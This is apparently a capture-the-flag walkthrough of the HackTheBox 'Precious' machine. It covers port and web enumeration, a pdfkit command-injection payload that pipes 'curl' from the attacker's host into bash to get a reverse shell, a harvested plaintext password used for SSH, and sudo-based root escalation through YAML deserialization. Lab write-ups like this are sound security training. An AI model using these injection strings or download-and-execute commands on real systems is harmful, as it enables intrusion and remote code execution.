Precious

#Linux #Enumeration #Command-Injection

Precious is an easy-rated Linux machine from HackTheBox created by Nauten. This machine is straightforward and does not have any rabbit hole or hard-to-find information, but still, you need to do good research because the exploit is a little uncommon. In the current post, my IP is 10.10.14.76, and the target’s IP is 10.129.49.93

Gather Information

This step is always the same, you have to ping the machine to see if is alive, and then use Nmap to scan all the ports to avoid surprises.

Local Terminal
ping -c 1 10.129.49.93
Ping’s output, by the TTL around 64, is a Linux Machine
Local Terminal
nmap -p- –open -T5 -v -n 10.129.49.93
Nmap’s output
Local Terminal
nmap -sC -sV -p 22,80 10.129.49.93

At this point, we know that is only a website, but we still need more details before trying anything.

Local Terminal
whatweb http://10.129.49.93
Relevant information {Domain = precious.htb}

Add that domain to your file /etc/hosts

  • Browser: http://10.129.49.93

Website main page

There is nothing special about this site, one of the best options, before interacting with the “Web Page to PDF” is using wfuzz

Local Terminal
wfuzz -c -t 200 –hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.219.49.93/FUZZ

Spoiler, no results.

  • Browser: Submit http://precious.htb

Ok, nothing happens with the own URL, let’s open a simple http.server using python to see how the site react to it, the result does not change if you use the command without an index.html file.

Local Terminal
python3 -m http.server 80

  • BrowserSubmit: http://10.10.14.76:80/

Website before submit
Content from index.html... as a .pdf file.

The output is a simple pdf file, nothing suspicious and with using only the textbox there is no way to get a response from bash commands, let’s check the metadata.

Local Terminal
exiftool output.pdf
output from exiftool, nothing suspicious

Weaponization and Exploitation

If you search for “pdfkit v0.8.6 exploit” you will find a critical command injection exploit. We will use that to get access to the machine. (https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795)

Exploit structure from the code, by security.snyk

As we can see, we only have to change the content from params[:name] from the url to execute a command, to test if this definitely works, you have to open a local terminal and write tcpdump -i eth0 icmp (To check your interface, use ifconfig) and submit at the browser http://10.10.14.76:80/?name=#{‘%20`ping -c 1 10.10.14.76 | bash`’}.

After the test, now we know that is working and we can create a reverse shell, for this, we need two local terminals and one index.html file with a bash command inside.

Local Terminal 1
vi index.html
python3 -m http.server 80
Content of index.html
Local Terminal 2
nc -nlvp 443

  • BrowserSubmit: http://10.10.14.76:80/?name=#{‘%20`curl 10.10.14.76 | bash`’}

LocalTerm2, now connected as user Ruby

You can close your LocalTerm1 and the LocalTerm2 now is the target command prompt called “Target”. After this, a good practice is to make a bash treatment.

Target folder exploration, searching for user.txt

Looks like only Henry can open the user flag, we need to gain his privileges, and for that we need to find any important file that could contain his credentials, like configs.

So, our best option at this moment, is to return to home and check if our account, user ruby, has something in the personal folder. At first glance it shows that there is nothing there, but if you show hidden files you can see more stuff.

Target Terminal
cd /home/
ls -l ./ruby
ls -la ./ruby
Folder ruby

But there are many folders…

Target Terminal
find -name “*config*”
Search for every config file inside folder ruby, usual location of credentials.
Target Terminal
cat ./ruby/.bundle/config
Content of .bundle/config file, Henry’s password.

Our best option now, is to open a new LocalTerm and try to login using ssh with these credentials {henry@Q3c1AqGHtoI0aXAYFH}

Local Terminal
ssh henry@10.129.49.93
LocalTerm after login

We are in, now your LocalTerm is Henry, let’s go to his folder and open the file user.txt

Target Terminal - Henry
cd /home/henry
cat user.txt
First flag acquired

Privileges Scalation

Target Terminal - Henry
cd /root/

Now we need to get the credentials of root.

Target Terminal - Henry
sudo -l
commands’s output

Looks like as Henry, we can execute that “rb” file as the user Root without password

Target Terminal - Henry
cat /opt/update_dependencies.rb
Code of “update_dependencies.rb”

At first glance, we can see that read a file called “dependencies.yml”, we can use that for us.

Target Terminal - Henry
find -name “dependencies.yml”
cat ./sample/dependencies.yml

Nothing important in the content, but there is an exploit called Yaml Deserialization (It took me a lot of time to find it), that can be used here, by creating a new dependencies.yml file with this code, remember to create the new dependencies.yml at Henry’s folder because there you have writing permission.

New dependencies.yml’s code
Target Terminal - Henry
sudo /usr/bin/ruby /opt/update_dependencies.rb

Now we have to make a modification at the dependencies.yml file and then run again the previous command.

Location of the modification
Target Terminal - Henry
sudo /usr/bin/ruby /opt/update_dependencies.rb
/bin/bash -p

After executing again the command, we change from Henry to Root, now we have the permission to read the /root/ folder

Target Root
cd /root/
Target Root
cat root.txt
System flag
PreviousPhotobombNextMonitorsTwo

Last updated